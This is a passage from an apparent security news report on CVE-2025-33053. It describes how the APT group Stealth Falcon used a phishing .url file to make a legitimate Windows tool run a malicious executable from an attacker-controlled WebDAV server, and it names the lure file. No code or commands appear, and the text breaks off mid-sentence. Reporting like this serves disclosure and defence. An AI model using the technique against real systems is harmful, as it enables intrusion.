Microsoft Windows WebDAV 0-Day RCE Vulnerability Actively Exploited in The Wild

A critical zero-day vulnerability in Microsoft Windows, designated CVE-2025-33053, has been actively exploited by the advanced persistent threat (APT) group Stealth Falcon.

The flaw, enabling remote code execution (RCE) through manipulation of a system’s working directory, was addressed by Microsoft in its June 2025 Patch Tuesday updates following CPR’s responsible disclosure. Below is a technical breakdown of the attack and its implications.

Discovery and Exploitation of CVE-2025-33053

In March 2025, CPR identified an attempted cyberattack targeting a Turkish defense company.

The attack leveraged a malicious .url file, likely delivered via spear-phishing emails, to exploit CVE-2025-33053.

This vulnerability allows attackers to manipulate the working directory of legitimate Windows tools, such as iediagcmd.exe, to execute malicious files hosted on an attacker-controlled WebDAV server.

The .url file, named TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url, redirected the execution of iediagcmd.exe to a malicious route.exe on a ...